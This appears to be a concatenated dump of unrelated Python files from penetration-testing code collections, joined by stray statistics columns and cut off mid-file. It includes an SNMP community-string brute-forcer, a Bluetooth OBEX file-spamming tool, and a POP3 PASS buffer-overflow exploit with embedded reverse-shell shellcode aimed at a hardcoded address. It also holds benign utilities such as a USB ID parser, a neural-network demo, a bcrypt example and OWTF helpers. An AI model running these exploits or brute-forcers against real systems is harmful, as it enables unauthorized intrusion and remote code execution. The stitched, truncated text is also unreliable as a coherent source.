for i in range(len(resultsList) - args.first):
resultsList.pop()
table = tabulate.tabulate(resultsList, headers=['#',] + headers, showindex='always', tablefmt='pretty')
if args.output:
with open(args.output, 'w', encoding='utf-8') as f:
f.write(str(table))
else:
print('\n' + table)
if args.first > 0:
                out(f'\n[+] Found {Logger.colored(args, len(resultsList), "green")} symbols meeting all the criteria (showing only the first {Logger.colored(args, args.first, "magenta")}).\n')
            else:
                out(f'\n[+] Found {Logger.colored(args, len(resultsList), "green")} symbols meeting all the criteria.\n')
        else:
            out(f'[-] Did not find any symbols meeting the specified criteria.')
out(f'[.] Processed {Logger.colored(args, filesProcessed.value, "green")} files and {Logger.colored(args, symbolsProcessed.value, "green")} symbols.')
out('[.] Time elapsed: {}'.format(Logger.colored(args, time_elapsed, "magenta")))
if __name__ == '__main__':
freeze_support()
main() | 36.084149 | 213 | 0.585625 |
PenetrationTestingScripts | #coding=utf-8
import time
import threading
from printers import printPink,printGreen
from multiprocessing.dummy import Pool
from pysnmp.entity.rfc3413.oneliner import cmdgen
class snmp_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/snmp.conf")
def snmp_connect(self,ip,key):
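        # attempts an SNMPv1 GET of sysDescr.0 (OID 1.3.6.1.2.1.1.1.0) using the
        # supplied community string; any varBinds in the reply means the community is valid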
crack =0
try:
errorIndication, errorStatus, errorIndex, varBinds =\
cmdgen.CommandGenerator().getCmd(
cmdgen.CommunityData('my-agent',key, 0),
cmdgen.UdpTransportTarget((ip, 161)),
(1,3,6,1,2,1,1,1,0)
)
if varBinds:
crack=1
except:
pass
return crack
def snmp_l(self,ip,port):
try:
for data in self.lines:
flag=self.snmp_connect(ip,key=data)
if flag==1:
self.lock.acquire()
printGreen("%s snmp has weaken password!!-----%s\r\n" %(ip,data))
self.result.append("%s snmp has weaken password!!-----%s\r\n" %(ip,data))
self.lock.release()
break
else:
self.lock.acquire()
print "test %s snmp's scan fail" %(ip)
self.lock.release()
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
printPink("crack snmp now...")
print "[*] start crack snmp %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in pinglist:
pool.apply_async(func=self.snmp_l,args=(str(ip).split(':')[0],""))
pool.close()
pool.join()
print "[*] stop crack snmp %s" % time.ctime()
print "[*] crack snmp done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
| 31.757576 | 98 | 0.503933 |
cybersecurity-penetration-testing | #
# Bluetooth scanner with ability to spam devices
# with incoming OBEX Object Push requests containing
# specified file.
#
# Mariusz Banach / MGeeky, 16'
#
# Partially based on `Violent Python` snippets.
# Modules required:
# python-bluez
# python-obexftp
#
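#
# Example run (illustrative only -- the script and file names below are placeholders):
#   python bt_carpet_bomb.py -f card.vcf -t 10 -r 2
#   python bt_carpet_bomb.py -f card.vcf --spam
#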
import bluetooth
import scapy
import obexftp
import sys
import optparse
import threading
import time
import os
foundDevs = []
def printDev(name, dev, txt='Bluetooth device'):
print '[+] %s: "%s" (MAC: %s)' % (txt, name, dev)
def retBtAddr(addr):
btAddr = str(hex(int(addr.replace(':', ''), 16) + 1))[2:]
btAddr = btAddr[0:2] + ':' + btAddr[2:4] + ':' + btAddr[4:6] + \
':' + btAddr[6:8] + ':' + btAddr[8:10] + ':' + btAddr[10:12]
return btAddr
def checkBluetooth(btAddr):
btName = bluetooth.lookup_name(btAddr)
if btName:
printDev('Hidden Bluetooth device detected', btName, btAddr)
return True
return False
def sendFile(dev, filename):
if os.path.exists(filename):
client = obexftp.client(obexftp.BLUETOOTH)
channel = obexftp.browsebt(dev, obexftp.PUSH)
print '[>] Sending file to %s@%s' % (dev, str(channel))
client.connect(dev, channel)
ret = client.put_file(filename)
if int(ret) >= 1:
print '[>] File has been sent.'
else:
print '[!] File has not been accepted.'
client.disconnect()
else:
print '[!] Specified file: "%s" does not exists.'
def findDevs(opts):
global foundDevs
devList = bluetooth.discover_devices(lookup_names=True)
repeat = range(0, int(opts.repeat))
for (dev, name) in devList:
if dev not in foundDevs:
name = str(bluetooth.lookup_name(dev))
printDev(name, dev)
foundDevs.append(dev)
for i in repeat:
sendFile(dev, opts.file)
continue
if opts.spam:
for i in repeat:
sendFile(dev, opts.file)
def main():
parser = optparse.OptionParser(usage='Usage: %prog [options]')
parser.add_option('-f', '--file', dest='file', metavar='FILE', help='Specifies file to be sent to discovered devices.')
parser.add_option('-t', '--time', dest='time', metavar='TIMEOUT', help='Specifies scanning timeout (default - 0 secs).', default='0')
parser.add_option('-r', '--repeat', dest='repeat', metavar='REPEAT', help='Number of times to repeat file sending after finding a device (default - 1)', default='1')
    parser.add_option('-s', '--spam', dest='spam', action='store_true', help='Spam found devices with the file continuously')
print '\nBluetooth file carpet bombing via OBEX Object Push'
print 'Mariusz Banach / MGeeky 16\n'
(opts, args) = parser.parse_args()
    if not opts.file:
        print '[!] Please specify a file to send with -f/--file.'
        sys.exit(0)
    if not os.path.exists(opts.file):
        print '[!] Specified file: "%s" does not exist.' % opts.file
        sys.exit(0)
print '[+] Started Bluetooth scanning. Ctr-C to stop...'
timeout = float(opts.time)
try:
while True:
findDevs(opts)
time.sleep(timeout)
except KeyboardInterrupt, e:
print '\n[?] User interruption.'
if __name__ == '__main__':
main() | 30.509804 | 169 | 0.607221 |
cybersecurity-penetration-testing | import urllib2
import sys
__author__ = 'Preston Miller and Chapin Bryce'
__date__ = '20160401'
__version__ = 0.02
__description__ = """Reads Linux-usb.org's USB.ids file and parses into usable data for parsing VID/PIDs"""
def main():
ids = get_ids()
usb_file = get_usb_file()
usbs = parse_file(usb_file)
    vendor, product = search_key(usbs, ids)
    print 'Vendor: %s\nProduct: %s' % (vendor, product)
def get_ids():
if len(sys.argv) >= 3:
return sys.argv[1], sys.argv[2]
else:
        print 'Please provide the vendor ID and product ID, separated by spaces, on the command line.'
sys.exit(1)
def get_usb_file():
url = 'http://www.linux-usb.org/usb.ids'
return urllib2.urlopen(url)
def parse_file(usb_file):
usbs = {}
curr_id = ''
for line in usb_file:
if line.startswith('#') or line == '\n':
pass
else:
if not(line.startswith('\t')) and (line[0].isdigit() or line[0].islower()):
usb_id, name = getRecord(line.strip())
curr_id = usb_id
usbs[usb_id] = [name, {}]
elif line.startswith('\t') and line.count('\t') == 1:
usb_id, name = getRecord(line.strip())
usbs[curr_id][1][usb_id] = name
return usbs
def getRecord(record_line):
split = record_line.find(' ')
record_id = record_line[:split]
record_name = record_line[split + 1:]
return record_id, record_name
def search_key(usb_dict, ids):
vendor_key = ids[0]
product_key = ids[1]
try:
vendor = usb_dict[vendor_key][0]
except KeyError:
vendor = 'Unknown'
try:
product = usb_dict[vendor_key][1][product_key]
except KeyError:
product = 'Unknown'
return vendor, product
| 24.382353 | 107 | 0.569855 |
Mastering-Machine-Learning-for-Penetration-Testing | """
network.py
~~~~~~~~~~
A module to implement the stochastic gradient descent learning
algorithm for a feedforward neural network. Gradients are calculated
using backpropagation. Note that I have focused on making the code
simple, easily readable, and easily modifiable. It is not optimized,
and omits many desirable features.
"""
#### Libraries
# Standard library
import random
# Third-party libraries
import numpy as np
class Network(object):
def __init__(self, sizes):
"""The list ``sizes`` contains the number of neurons in the
respective layers of the network. For example, if the list
was [2, 3, 1] then it would be a three-layer network, with the
first layer containing 2 neurons, the second layer 3 neurons,
and the third layer 1 neuron. The biases and weights for the
network are initialized randomly, using a Gaussian
distribution with mean 0, and variance 1. Note that the first
layer is assumed to be an input layer, and by convention we
won't set any biases for those neurons, since biases are only
ever used in computing the outputs from later layers."""
self.num_layers = len(sizes)
self.sizes = sizes
self.biases = [np.random.randn(y, 1) for y in sizes[1:]]
self.weights = [np.random.randn(y, x)
for x, y in zip(sizes[:-1], sizes[1:])]
def adversarial(self, n):
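        # Gradient descent on the *input* rather than the weights: starting
        # from random noise, nudge x for 10000 steps so that the network's
        # output moves towards the one-hot vector for digit ``n``.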
goal = np.zeros((10, 1))
goal[n] = 1
x = np.random.normal(.5, .3, (784, 1))
orig = np.copy(x)
for i in range(10000):
d = self.input_derivative(x,goal)
x -= .01 * d
return x
def feedforward(self, a):
"""Return the output of the network if ``a`` is input."""
for b, w in zip(self.biases, self.weights):
a = sigmoid(np.dot(w, a)+b)
return a
def SGD(self, training_data, epochs, mini_batch_size, eta,
test_data=None):
"""Train the neural network using mini-batch stochastic
gradient descent. The ``training_data`` is a list of tuples
``(x, y)`` representing the training inputs and the desired
outputs. The other non-optional parameters are
self-explanatory. If ``test_data`` is provided then the
network will be evaluated against the test data after each
epoch, and partial progress printed out. This is useful for
tracking progress, but slows things down substantially."""
if test_data: n_test = len(test_data)
n = len(training_data)
for j in xrange(epochs):
random.shuffle(training_data)
mini_batches = [
training_data[k:k+mini_batch_size]
for k in xrange(0, n, mini_batch_size)]
for mini_batch in mini_batches:
self.update_mini_batch(mini_batch, eta)
if test_data:
print("Epoch {0}: {1} / {2}".format(
j, self.evaluate(test_data), n_test))
else:
print("Epoch {0} complete".format(j))
def update_mini_batch(self, mini_batch, eta):
"""Update the network's weights and biases by applying
gradient descent using backpropagation to a single mini batch.
The ``mini_batch`` is a list of tuples ``(x, y)``, and ``eta``
is the learning rate."""
nabla_b = [np.zeros(b.shape) for b in self.biases]
nabla_w = [np.zeros(w.shape) for w in self.weights]
for x, y in mini_batch:
delta_nabla_b, delta_nabla_w = self.backprop(x, y)
nabla_b = [nb+dnb for nb, dnb in zip(nabla_b, delta_nabla_b)]
nabla_w = [nw+dnw for nw, dnw in zip(nabla_w, delta_nabla_w)]
self.weights = [w-(eta/len(mini_batch))*nw
for w, nw in zip(self.weights, nabla_w)]
self.biases = [b-(eta/len(mini_batch))*nb
for b, nb in zip(self.biases, nabla_b)]
def backprop(self, x, y):
"""Return a tuple ``(nabla_b, nabla_w)`` representing the
gradient for the cost function C_x. ``nabla_b`` and
``nabla_w`` are layer-by-layer lists of numpy arrays, similar
to ``self.biases`` and ``self.weights``."""
nabla_b = [np.zeros(b.shape) for b in self.biases]
nabla_w = [np.zeros(w.shape) for w in self.weights]
# feedforward
activation = x
activations = [x] # list to store all the activations, layer by layer
zs = [] # list to store all the z vectors, layer by layer
for b, w in zip(self.biases, self.weights):
z = np.dot(w, activation)+b
zs.append(z)
activation = sigmoid(z)
activations.append(activation)
# backward pass
delta = self.cost_derivative(activations[-1], y) * \
sigmoid_prime(zs[-1])
nabla_b[-1] = delta
nabla_w[-1] = np.dot(delta, activations[-2].transpose())
# Note that the variable l in the loop below is used a little
# differently to the notation in Chapter 2 of the book. Here,
# l = 1 means the last layer of neurons, l = 2 is the
# second-last layer, and so on. It's a renumbering of the
# scheme in the book, used here to take advantage of the fact
# that Python can use negative indices in lists.
for l in xrange(2, self.num_layers):
z = zs[-l]
sp = sigmoid_prime(z)
delta = np.dot(self.weights[-l+1].transpose(), delta) * sp
nabla_b[-l] = delta
nabla_w[-l] = np.dot(delta, activations[-l-1].transpose())
return (nabla_b, nabla_w)
def input_derivative(self, x, y):
""" Calculate derivatives wrt the inputs"""
nabla_b = [np.zeros(b.shape) for b in self.biases]
nabla_w = [np.zeros(w.shape) for w in self.weights]
# feedforward
activation = x
activations = [x] # list to store all the activations, layer by layer
zs = [] # list to store all the z vectors, layer by layer
for b, w in zip(self.biases, self.weights):
z = np.dot(w, activation)+b
zs.append(z)
activation = sigmoid(z)
activations.append(activation)
# backward pass
delta = self.cost_derivative(activations[-1], y) * \
sigmoid_prime(zs[-1])
nabla_b[-1] = delta
nabla_w[-1] = np.dot(delta, activations[-2].transpose())
# Note that the variable l in the loop below is used a little
# differently to the notation in Chapter 2 of the book. Here,
# l = 1 means the last layer of neurons, l = 2 is the
# second-last layer, and so on. It's a renumbering of the
# scheme in the book, used here to take advantage of the fact
# that Python can use negative indices in lists.
for l in xrange(2, self.num_layers):
z = zs[-l]
sp = sigmoid_prime(z)
delta = np.dot(self.weights[-l+1].transpose(), delta) * sp
nabla_b[-l] = delta
nabla_w[-l] = np.dot(delta, activations[-l-1].transpose())
return self.weights[0].T.dot(delta)
def evaluate(self, test_data):
"""Return the number of test inputs for which the neural
network outputs the correct result. Note that the neural
network's output is assumed to be the index of whichever
neuron in the final layer has the highest activation."""
test_results = [(np.argmax(self.feedforward(x)), y)
for (x, y) in test_data]
return sum(int(x == y) for (x, y) in test_results)
def cost_derivative(self, output_activations, y):
"""Return the vector of partial derivatives \partial C_x /
\partial a for the output activations."""
return (output_activations-y)
#### Miscellaneous functions
def sigmoid(z):
"""The sigmoid function."""
return 1.0/(1.0+np.exp(-z))
def sigmoid_prime(z):
"""Derivative of the sigmoid function."""
return sigmoid(z)*(1-sigmoid(z))
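
# Example usage (a sketch; assumes ``training_data``/``test_data`` are lists of
# ``(x, y)`` tuples shaped as described in the SGD docstring, e.g. MNIST vectors):
#
#   net = Network([784, 30, 10])
#   net.SGD(training_data, 30, 10, 3.0, test_data=test_data)
#   crafted = net.adversarial(5)   # an input nudged towards the digit "5"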
| 42.331551 | 77 | 0.591953 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
import socket
buffer=["A"]
counter=100
LPORT1433 = ""
LPORT1433 += "\x9b\x98\x40\x48\x4b\x98\xd6\x41\x41\x42\xda\xd8"
LPORT1433 += "\xd9\x74\x24\xf4\xbd\x24\x8b\x25\x21\x58\x29\xc9"
LPORT1433 += "\xb1\x52\x83\xe8\xfc\x31\x68\x13\x03\x4c\x98\xc7"
LPORT1433 += "\xd4\x70\x76\x85\x17\x88\x87\xea\x9e\x6d\xb6\x2a"
LPORT1433 += "\xc4\xe6\xe9\x9a\x8e\xaa\x05\x50\xc2\x5e\x9d\x14"
LPORT1433 += "\xcb\x51\x16\x92\x2d\x5c\xa7\x8f\x0e\xff\x2b\xd2"
LPORT1433 += "\x42\xdf\x12\x1d\x97\x1e\x52\x40\x5a\x72\x0b\x0e"
LPORT1433 += "\xc9\x62\x38\x5a\xd2\x09\x72\x4a\x52\xee\xc3\x6d"
LPORT1433 += "\x73\xa1\x58\x34\x53\x40\x8c\x4c\xda\x5a\xd1\x69"
LPORT1433 += "\x94\xd1\x21\x05\x27\x33\x78\xe6\x84\x7a\xb4\x15"
LPORT1433 += "\xd4\xbb\x73\xc6\xa3\xb5\x87\x7b\xb4\x02\xf5\xa7"
LPORT1433 += "\x31\x90\x5d\x23\xe1\x7c\x5f\xe0\x74\xf7\x53\x4d"
LPORT1433 += "\xf2\x5f\x70\x50\xd7\xd4\x8c\xd9\xd6\x3a\x05\x99"
LPORT1433 += "\xfc\x9e\x4d\x79\x9c\x87\x2b\x2c\xa1\xd7\x93\x91"
LPORT1433 += "\x07\x9c\x3e\xc5\x35\xff\x56\x2a\x74\xff\xa6\x24"
LPORT1433 += "\x0f\x8c\x94\xeb\xbb\x1a\x95\x64\x62\xdd\xda\x5e"
LPORT1433 += "\xd2\x71\x25\x61\x23\x58\xe2\x35\x73\xf2\xc3\x35"
LPORT1433 += "\x18\x02\xeb\xe3\x8f\x52\x43\x5c\x70\x02\x23\x0c"
LPORT1433 += "\x18\x48\xac\x73\x38\x73\x66\x1c\xd3\x8e\xe1\xe3"
LPORT1433 += "\x8c\x6a\x63\x8b\xce\x8a\x81\xd5\x46\x6c\xe3\xf5"
LPORT1433 += "\x0e\x27\x9c\x6c\x0b\xb3\x3d\x70\x81\xbe\x7e\xfa"
LPORT1433 += "\x26\x3f\x30\x0b\x42\x53\xa5\xfb\x19\x09\x60\x03"
LPORT1433 += "\xb4\x25\xee\x96\x53\xb5\x79\x8b\xcb\xe2\x2e\x7d"
LPORT1433 += "\x02\x66\xc3\x24\xbc\x94\x1e\xb0\x87\x1c\xc5\x01"
LPORT1433 += "\x09\x9d\x88\x3e\x2d\x8d\x54\xbe\x69\xf9\x08\xe9"
LPORT1433 += "\x27\x57\xef\x43\x86\x01\xb9\x38\x40\xc5\x3c\x73"
LPORT1433 += "\x53\x93\x40\x5e\x25\x7b\xf0\x37\x70\x84\x3d\xd0"
LPORT1433 += "\x74\xfd\x23\x40\x7a\xd4\xe7\x70\x31\x74\x41\x19"
LPORT1433 += "\x9c\xed\xd3\x44\x1f\xd8\x10\x71\x9c\xe8\xe8\x86"
LPORT1433 += "\xbc\x99\xed\xc3\x7a\x72\x9c\x5c\xef\x74\x33\x5c"
LPORT1433 += "\x3a"
#Bingo, this works -- had an issue with bad chars. Reverse shell also works like a charm.
buffer = '\x41' * 2606
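# Payload layout as assembled in the PASS command below: 2606 filler bytes up to
# the saved return address, a 4-byte overwrite ('\x8f\x35\x4a\x5f', i.e. 0x5f4a358f
# little-endian, assumed to point at a JMP ESP), then the encoded stub in LPORT1433.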
if 1:
print"Fuzzing PASS with %s bytes" % len(buffer)
#print str(string)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.250.136',110))
data=s.recv(1024)
#print str(data)
s.send('USER username \r\n')
data=s.recv(1024)
print str(data)
s.send('PASS ' + buffer + '\x8f\x35\x4a\x5f'+ LPORT1433 + '\r\n')
#data=s.recv(1024)
#print str(data)
print "done"
#s.send('QUIT\r\n')
s.close()
| 40.903226 | 78 | 0.680786 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.5
i=0
print("------ While Basics ------")
while i < 5:
print("Without Braces : Statement %s "%i)
i=i+1
i=0
while (i < 5):
print("With Braces : Statement %s "%i)
i=i+1
print("------- While with Lists ------")
my_list=[1,2,"a","b",33.33,"c",4,5,['item 1','item 2']]
i=0
while(i < len(my_list)):
if (type(my_list[i]) == type(1)):
print ("Found Integer : %s "%my_list[i])
elif (type(my_list[i]) == type("a")):
print ("Found String : %s "%my_list[i])
elif (type(my_list[i]) == type([])):
print("------Found Inner list -Now lets iterate:---------")
j=0
while(j< len(my_list[i])):
print("Inner Item : %s "%my_list[i][j])
j =j +1
else:
print("Neither integer nor string : %s and Type is : %s "%(my_list[i],type(my_list[i])))
i=i+1
| 22.515152 | 90 | 0.540645 |
cybersecurity-penetration-testing | from scapy.all import *
import struct
interface = 'mon0'
ap_list = []
def info(fm):
if fm.haslayer(Dot11):
if ((fm.type == 0) & (fm.subtype==8)):
if fm.addr2 not in ap_list:
ap_list.append(fm.addr2)
print "SSID--> ",fm.info,"-- BSSID --> ",fm.addr2, \
"-- Channel--> ", ord(fm[Dot11Elt:3].info)
sniff(iface=interface,prn=info)
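# Note (assumed setup): 'mon0' must already be a wireless interface in monitor
# mode (e.g. one created with airmon-ng); otherwise sniff() will not see raw
# 802.11 beacon frames.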
| 23.857143 | 56 | 0.608069 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/python
# -*- coding: utf-8 -*-
import bcrypt
# Let's first enter a password
new = raw_input('Please enter a password: ')
# We'll encrypt the password with bcrypt with the default salt value of 12
hashed = bcrypt.hashpw(new, bcrypt.gensalt())
# We'll print the hash we just generated
print('The string about to be stored is: ' + hashed)
# Confirm we entered the correct password
plaintext = raw_input('Please re-enter the password to check: ')
# Check if both passwords match
if bcrypt.hashpw(plaintext, hashed) == hashed:
print 'It\'s a match!'
else:
print 'Please try again.'
| 32.222222 | 74 | 0.716918 |
owtf | """
owtf.models.session
~~~~~~~~~~~~~~~~~~~
"""
from sqlalchemy import Boolean, Column, Integer, String
from sqlalchemy.orm import relationship
from owtf.db.model_base import Model
from owtf.lib import exceptions
from owtf.models.target import target_association_table
class Session(Model):
__tablename__ = "sessions"
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=True)
active = Column(Boolean, default=False)
targets = relationship("Target", secondary=target_association_table, backref="sessions")
@classmethod
def get_by_id(cls, session, id):
session_obj = session.query(Session).get(id)
if not session_obj:
raise exceptions.InvalidSessionReference("No session with id: {!s}".format(id))
return session_obj.to_dict()
@classmethod
def get_active(cls, session):
session_id = session.query(Session.id).filter_by(active=True).first()
return session_id
@classmethod
def set_by_id(cls, session, session_id):
query = session.query(Session)
session_obj = query.get(session_id)
if not session_obj:
raise exceptions.InvalidSessionReference("No session with session_id: {!s}".format(session_id))
query.update({"active": False})
session_obj.active = True
session.commit()
| 30.837209 | 107 | 0.66886 |
cybersecurity-penetration-testing | import os,sys
from PIL import Image
from PIL.ExifTags import TAGS
for (i,j) in Image.open('image.jpg')._getexif().iteritems():
print '%s = %s' % (TAGS.get(i), j)
| 23.571429 | 60 | 0.643275 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import dpkt
import socket
def printPcap(pcap):
for (ts, buf) in pcap:
try:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
print '[+] Src: ' + src + ' --> Dst: ' + dst
except:
pass
def main():
    f = open('geotest.pcap', 'rb')  # dpkt expects the capture opened in binary mode
pcap = dpkt.pcap.Reader(f)
printPcap(pcap)
if __name__ == '__main__':
main()
| 17.392857 | 56 | 0.490272 |
cybersecurity-penetration-testing | from scapy.all import *
interface = 'mon0'
ap_list = []
def info(fm):
if fm.haslayer(Dot11):
if ((fm.type == 0) & (fm.subtype==8)):
if fm.addr2 not in ap_list:
ap_list.append(fm.addr2)
print "SSID--> ",fm.info,"-- BSSID --> ",fm.addr2
sniff(iface=interface,prn=info)
| 21.307692 | 53 | 0.602076 |
owtf | """
owtf.shell.utils
~~~~~~~~~~~~~~~~
# Inspired from:
# http://code.activestate.com/recipes/440554-module-to-allow-asynchronous-subprocess-use-on-win/
"""
import errno
import os
import platform
import subprocess
import sys
import time
if platform.system() == "Windows":
from win32file import ReadFile, WriteFile
from win32pipe import PeekNamedPipe
import msvcrt
else:
import select
import fcntl
PIPE = subprocess.PIPE
DISCONNECT_MESSAGE = "Other end disconnected!"
class DisconnectException(Exception):
def __init__(self, value):
self.parameter = value
def __str__(self):
return repr(self.parameter)
class AsyncPopen(subprocess.Popen):
def recv(self, maxsize=None):
return self._recv("stdout", maxsize)
def recv_err(self, maxsize=None):
return self._recv("stderr", maxsize)
def send_recv(self, input="", maxsize=None):
return self.send(input), self.recv(maxsize), self.recv_err(maxsize)
def get_conn_maxsize(self, which, maxsize):
if maxsize is None:
maxsize = 1024
elif maxsize < 1:
maxsize = 1
return getattr(self, which), maxsize
def _close(self, which):
getattr(self, which).close()
setattr(self, which, None)
if hasattr(subprocess, "mswindows"):
def send(self, input):
if not self.stdin:
return None
try:
x = msvcrt.get_osfhandle(self.stdin.fileno())
(errCode, written) = WriteFile(x, input)
except ValueError:
return self._close("stdin")
except (subprocess.pywintypes.error, Exception) as why:
if why[0] in (109, errno.ESHUTDOWN):
return self._close("stdin")
raise
return written
def _recv(self, which, maxsize):
conn, maxsize = self.get_conn_maxsize(which, maxsize)
if conn is None:
return None
try:
x = msvcrt.get_osfhandle(conn.fileno())
(read, navail, nMessage) = PeekNamedPipe(x, 0)
if maxsize < navail:
                navail = maxsize  # cap the read at maxsize
if navail > 0:
(errCode, read) = ReadFile(x, navail, None)
except ValueError:
return self._close(which)
except (subprocess.pywintypes.error, Exception) as why:
if why[0] in (109, errno.ESHUTDOWN):
return self._close(which)
raise
if self.universal_newlines:
read = self._translate_newlines(read)
return read
else:
def send(self, input):
if not self.stdin:
return None
if not select.select([], [self.stdin], [], 0)[1]:
return 0
try:
written = os.write(self.stdin.fileno(), input)
except OSError as why:
if why[0] == errno.EPIPE: # broken pipe
return self._close("stdin")
raise
return written
def _recv(self, which, maxsize):
conn, maxsize = self.get_conn_maxsize(which, maxsize)
if conn is None:
return None
flags = fcntl.fcntl(conn, fcntl.F_GETFL)
if not conn.closed:
fcntl.fcntl(conn, fcntl.F_SETFL, flags | os.O_NONBLOCK)
try:
if not select.select([conn], [], [], 0)[0]:
return ""
r = conn.read(maxsize)
if not r:
return self._close(which)
if self.universal_newlines:
r = self._translate_newlines(r)
return r
finally:
if not conn.closed:
fcntl.fcntl(conn, fcntl.F_SETFL, flags)
def recv_some(p, t=.1, e=1, tr=5, stderr=0):
if tr < 1:
tr = 1
x = time.time() + t
y = []
r = ""
pr = p.recv
if stderr:
pr = p.recv_err
while time.time() < x or r:
r = pr()
if r is None:
if e:
raise DisconnectException(DISCONNECT_MESSAGE)
else:
break
elif r:
y.append(r)
else:
time.sleep(max((x - time.time()) / tr, 0))
return "".join(y)
def send_all(p, data):
    if sys.version_info > (3,):
        # on Python 3, wrap in a memoryview so the slicing below does not copy bytes
        data = memoryview(data)
    while len(data):
        sent = p.send(data)
        if sent is None:
            raise DisconnectException(DISCONNECT_MESSAGE)
        # drop the bytes that were successfully written so the loop terminates
        data = data[sent:]
if __name__ == "__main__":
if sys.platform == "win32":
shell, commands, tail = ("cmd", ("dir /w", "echo HELLO WORLD"), "\r\n")
else:
shell, commands, tail = ("sh", ("ls", "echo HELLO WORLD"), "\n")
a = AsyncPopen(shell, stdin=PIPE, stdout=PIPE)
print(recv_some(a))
for cmd in commands:
send_all(a, cmd + tail)
print(recv_some(a))
send_all(a, "exit" + tail)
print(recv_some(a, e=0))
a.wait()
| 27.672222 | 96 | 0.517054 |
thieves-tools | import click
from lib import cheatsheet, question
# @click.group(invoke_without_command=True)
@click.group()
@click.pass_context
@click.help_option("-h", "--help")
def cli(ctx):
"""
Should fill this in :P
"""
pass
cli.add_command(cheatsheet)
cli.add_command(question)
| 13.842105 | 43 | 0.697509 |
owtf | #!/usr/bin/env python
try:
import http.server as server
except ImportError:
import BaseHTTPServer as server
import getopt
import re
import sys
try:
from urllib.parse import urlparse, urlencode
from urllib.request import urlopen, Request
from urllib.error import HTTPError, URLError
from urllib.request import (
HTTPHandler,
HTTPSHandler,
HTTPRedirectHandler,
ProxyHandler,
build_opener,
install_opener,
)
except ImportError:
from urlparse import urlparse
from urllib import urlencode
from urllib2 import (
urlopen,
Request,
HTTPError,
HTTPHandler,
HTTPSHandler,
HTTPRedirectHandler,
ProxyHandler,
build_opener,
install_opener,
URLError,
)
################## HEADER ###################################
#
# Traceroute-like HTTP scanner
# Using the "Max-Forwards" header
# RFC 2616 - HTTP/1.1 - Section 14.31
# RFC 3261 - SIP - Section 8.1.1.6
#
#
# By Nicolas Gregoire ([email protected])
#
# 0.5 : First public release
# 0.4 : Private release, looking for bugs - More heuristics
# 0.3 : A lot more options - More verbosity levels - Some heuristics
#
# By Julien Cayssol ([email protected])
#
# 0.2 : Add extract of headers
# 0.1 : Initial version
#
#
# Heuristics :
# - Status Codes :
# - HTTP Status Code == 502
# - HTTP Status Code == 483
# - Specific data in body or headers :
# - X-Forwarded-For in body when using TRACE
# - Via or X-Via in headers
# - Differences between hops :
# - HTTP Status Codes
# - Server headers
# - Content-Type headers
# - Via headers
# - HTML titles
# - HTML <address> tags
# - X-Forwarded-For values when using TRACE
#
############## GLOBAL VARIABLES ###################################
global_data = {
"StatusCode": {},
"Server": {},
"Content-Type": {},
"Title": {},
"Address": {},
"X-Fwd": {},
"Via": {},
}
score = 0
verbosity = 0
scheme = "http"
host = "127.0.0.1"
port = "80"
path = "/"
method = "TRACE"
body_content = None
max_fwds = 3
userAgent = (
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.2) Gecko/20060502 Firefox/1.5.0.2"
)
contentType = "text/html"
############## FUNCTIONS ###################################
# Pretty printing
def zprint(string, flag="=="):
print("[" + flag + "] " + string)
# Increment the heuristic score
def inc_score():
global score
score = score + 1
if verbosity:
zprint("Score : " + str(score), "!!")
# Help
def showUsage():
print(
"Usage : "
+ sys.argv[0]
+ " [-h] [-m method] [-s scheme] [-t target] [-p port] [-P path] [-v 0|1|2] [-f forwards]"
)
print("\t[-h] Help (this text)")
print('\t[-m] HTTP Method : default is "TRACE"')
print('\t[-s] Scheme : default is "http"')
print('\t[-t] Target host : default is "127.0.0.1"')
print('\t[-p] Port : default is "80"')
print('\t[-P] Path : default is "/"')
print('\t[-f] Max # of forwards : default is "3"')
print("\t[-v] Verbosity : 0 = default, 1 = verbose, 2 = debug")
print("Examples :")
print(sys.argv[0] + " -t www.example.org")
print(" => TRACE /")
print(sys.argv[0] + " -t www.example.org -m GET -s https -p 443 -v 1")
print(" => GET / on a SSL host")
print(sys.argv[0] + " -t www.example.org -m POST -P /axis2/checkacc -v 2 -f 5")
print(" => Debug mode on a specific end-point")
sys.exit(1)
# Parse CLI args
def getArguments():
try:
if len(sys.argv) < 2:
zprint('No arguments ? Probably a bad choice. Use "-h" ...', "!!")
sys.exit(1)
optlist, list = getopt.getopt(sys.argv[1:], "hm:s:t:p:P:v:f:")
except getopt.GetoptError:
showUsage()
for opt in optlist:
if opt[0] == "-h":
showUsage()
if opt[0] == "-m":
global method
method = opt[1]
if opt[0] == "-s":
global scheme
scheme = opt[1]
if opt[0] == "-t":
global host
host = opt[1]
if opt[0] == "-p":
global port
port = opt[1]
if opt[0] == "-P":
global path
path = opt[1]
if opt[0] == "-v":
global verbosity
verbosity = int(opt[1])
if opt[0] == "-f":
global max_fwds
max_fwds = int(opt[1])
# Extract some interesting data from the headers
def analyse_headers(data):
if verbosity:
zprint("Analyzing headers", "**")
wanted_headers = [
"Server",
"Via",
"X-Via",
"Set-Cookie",
"X-Forwarded-For",
"Content-Type",
"Content-Length",
"Last-Modified",
"Location",
"Date",
]
for h_name in wanted_headers:
h_value = data.get(h_name)
if h_value != None:
# Print the value
if verbosity:
zprint(h_value, h_name)
# Add it to the global structure if needed
if h_name == "Server" or h_name == "Content-Type":
global_data[h_name][hop] = h_value
# Some heuristics
if h_name == "Via" or h_name == "X-Via":
zprint('"Via" header : Probably a reverse proxy', "++")
global_data["Via"][hop] = h_value
inc_score()
# Extract some interesting data from the body
def analyse_body(data):
if verbosity:
zprint("Analyzing body", "**")
wanted_patterns = [
"<title>(.*)</title>",
"<address>(.*)</address>",
"Reason: <strong>(.*)</strong>",
